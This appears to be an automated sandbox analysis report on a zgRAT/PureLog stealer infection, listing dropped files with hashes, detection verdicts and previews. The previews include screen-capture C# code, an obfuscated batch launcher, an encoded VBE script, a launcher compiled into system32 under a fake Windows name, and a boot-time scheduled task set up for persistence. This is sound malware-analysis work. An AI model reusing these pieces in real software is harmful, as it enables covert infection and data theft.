Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.o.d.m.i.d.m.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.o.d.m.i.d.m.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.282372349821806
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfHQzWZEifHQu:V3ka6KOkqeFkOfHQAEifHQu
MD5:	BEE325FBD523A38B5E6558E21F05E39C
SHA1:	0BD4CBAFF3DBA636A490B5D28557F07A9920F969
SHA-256:	04A60C9300BBC1B50B8A62CB1971100CBA4AD15D16ED1FCC7B316F7546F504F5
SHA-512:	5742DF4E15E8444DDAED8B29F16B6E7BC3DE04FE4999506A0865D5135555B5D4B9A2E1BF5126F84540914F0497D1460352CD16DD386337AF1537243BA95F4F32
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.0.cs"

C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1507795843033817
Encrypted:	false
SSDEEP:	48:6j7oEAtf0KhzBU/cGf6mtJQN084pW1ulda3Rq:pNz0c5mYO8+PK
MD5:	886FE39A5B5B111EF783446D81A00BC4
SHA1:	F50245FAD46E3D3974BBE364DBBEC65A55E5B8FC
SHA-256:	4BF6E125F01247C335B91681530152BD024DF6C807ABFA858350E9AEAC6AC5F6
SHA-512:	97351F8A660F89D0CB43F4D041400E51D9AEAEABCD2DBEAB6372BE770BF251CCDD915EC3F4EF33841DDC03D0561012DE8DCC6A963BE4E456CB8126F96C164150
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1148
Entropy (8bit):	5.4737146933831
Encrypted:	false
SSDEEP:	24:KJfVxId3ka6KOkqeFkOfHQAEifHQPKax5DqBVKVrdFAMBJTH:unkka6NkqeFkywAEuwPK2DcVKdBJj
MD5:	B9F872918F7DD62C2DE8C98FFAD08386
SHA1:	BB77BDFB27F546902FD944C897B5634B8BE9F618
SHA-256:	9EFFDF25038B15840A8200923DAEB40DE44BA0901528B52B1A21AB473A5142EB
SHA-512:	1F849B100AE455E615A298F31EDB2F81377812E75B850D46B9161D44E74DBD6A4502420C1C85C2F3D1EF0B5C430E7CAF52072AE0DA178DFC2779359D3ADD81D9
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

C:\Users\user\AppData\Local\Temp\kYh3V5B68H

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lOxAnp1DBf

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\m8ZBG4LoLu

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.031377595969092
Encrypted:	false
SSDEEP:	3:svwBUcsAoQEHTDWC26AHMKvMSQL4cSv:sYBfvQT4bMKvMSQkfv
MD5:	77218AE27E9AD896918D9A081C61B1BE
SHA1:	3C8EBAA8FA858B82E513CCF482E11172B0F52CE0
SHA-256:	E09540A47F3647A9FDF9673281E2664441BBAEE8D3236D22B1875B9D23ABACAB
SHA-512:	6A16B367A762132172830FD81C41C58AC49DE788EED93D4C5526F8F0E6859703B336A137FD8D4FE7088B4110D72E5F4767B6462BC4651769924B67305719F30A
Malicious:	true
Preview:	%lJWFircOu%%nvRebZgpg%..%kImkMpPKuFLx%"%Temp%\msAgentSavesmonitor/ChainComServermonitor.exe"%EaZpTohGW%

C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	217
Entropy (8bit):	5.712224367043722
Encrypted:	false
SSDEEP:	6:GmvwqK+NkLzWbHnPv7qK+NkLzWHFojm8eGxjs:G1MCzWLnP/MCzWlStjs
MD5:	D6DA6166258E23C9170EE2A4FF73C725
SHA1:	C3C9D6925553E266FE6F20387FEEE665CE3E4BA9
SHA-256:	78EE67A8AE359F697979F4CD3C7228D3235C32D3B611303E070B71414591BA1E
SHA-512:	37A5A18ACBB56E5458BAEBB12A4D3B3229B218EB606BE3535D1C30E8E0D4FA969543889C587078456321209FE4503688432F45FF35A7AF598B770393E7AE3B05
Malicious:	true
Preview:	#@~^wAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.k4?4+sscIEU~r]P+s2uzhkbT+xD?m-+k:GxbYG.JzWVLX!V/bTfL+2}&dL//c4CYrSPZ~~WmV/n8j0AAA==^#~@.

C:\Users\user\AppData\Local\Temp\qVTJy1iTs0

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ssPALK1ZxW

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:dG7KAPIe:du0e
MD5:	84E03A23BF6F4DE55C26296223490E67
SHA1:	735E026D88070F7CBD3DDAF1D11A29E2492ED427
SHA-256:	492C5251C0C35ACEE30FA3DE6B53784F2AD898C0CCFA2A32B02B6F772F4030E7
SHA-512:	65DE0154DDD44925CB97CF171ADB1E33BFF5E2E6E7E49FC35342FEB6884A0D4341C93C9B5863A9EE5DCBA1E5153AF6E0583BCC2399B581AAA097C54508AA9B35
Malicious:	false
Preview:	83UT3GEA40TiMIzvotej580qD

C:\Users\user\AppData\Local\Temp\tFoNJDsTYH

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\w86n7fUK2s

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:sGdSJVugJ:sXEgJ
MD5:	0E27105FCC6F955910B1CBD44ECADFEB
SHA1:	D7E5B195A2692A1C7D150537ECBEE3B29775EEB7
SHA-256:	D9BCD68C2EBC9AB29E5D3F2F6B6A95ED53EC41BC272E288AE611C0FA1578157F
SHA-512:	DB1C41BC89B4D3589AFFD51EC67F74B9371440FA02EE23780FAF18ACE344A077E668CA8BDC19FA43CEBF6952BA450B2332AF40299A7E3D2761209F4C6BF32F0C
Malicious:	false
Preview:	BEmgDprsxN7CzBEhlorqKyoAl

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xFUMz7TEm5

Download File

Process:	C:\Recovery\HpQPPZazcv.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.378783493486176
Encrypted:	false
SSDEEP:	3:Y2Qt6eYYn:Y2Qt6eYYn
MD5:	6CA4960355E4951C72AA5F6364E459D5
SHA1:	2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
SHA-256:	88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
SHA-512:	8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
Malicious:	false
Preview:	{"Surveys":{}}

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.0.cs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	373
Entropy (8bit):	4.934382447319216
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JR3RiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKH
MD5:	F3C0BE45881000BAE58A40AE20BCBBD3
SHA1:	A6396273EDE30094B5C38559C94B6328E91D3152
SHA-256:	11870F7F8AE1E8EE7B4EE21F192E6B6FA00AC21FE2CB03738A0E7ECA18F371AA
SHA-512:	539B33971F575EDF7E023AB453B4A2F437DCC598BEFA4894AE40DED589D13B7A0B8C3CF8546CA9C9D554980F307444775ADADE0846A706CCC7AAB85F03EC619E
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\HpQPPZazcv.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.088807837827853
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fiqBHn:Hu7L//TRq79cQWf6qxn
MD5:	5D4C090C60ACBA9A0B2B9DBFAFBF52D8
SHA1:	E4041C9035457797EF7861128FDEBAB2C6F31240
SHA-256:	E7C09BA1C63DB707CC2A446A614D429E9979458491791A54FEC37DBBCD9FE3D8
SHA-512:	5EFFB0A4099FD5FB9F6176B64DFDFD61193B5B0DA5858263F3D5F6FCFA373205285679427E0C03DE4BF1C29AFBB694F14DE60C4B128AC27963C2FBDD45D15682
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.0.cs"

C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.out

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
Category:	modified
Size (bytes):	781
Entropy (8bit):	5.265727768524531
Encrypted:	false
SSDEEP:	24:KJfC6MI/un/Vq79tWf6fKax5DqBVKVrdFAMBJTH:uCTN/VquqK2DcVKdBJj
MD5:	78CED89DD628C344A00EF81C1C63AD8F
SHA1:	9E728034855BBB160AA4E6E64B3AA5D980639B58
SHA-256:	8F690D7F4AEA4C8D8681C8C98BE89AE83900B5781389AFE3B0E9A7EA9ADEDF85
SHA-512:	43E6A2D543D88EC4B10923B0F50B423F3B1A9036D4D341600A7490AE25775C3C7EF7B170450D9556F0C369156A183DC90D3F25D10E7E352284C20DE5CE09FC32
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\AwjkpWnj.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BLFrfvoX.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
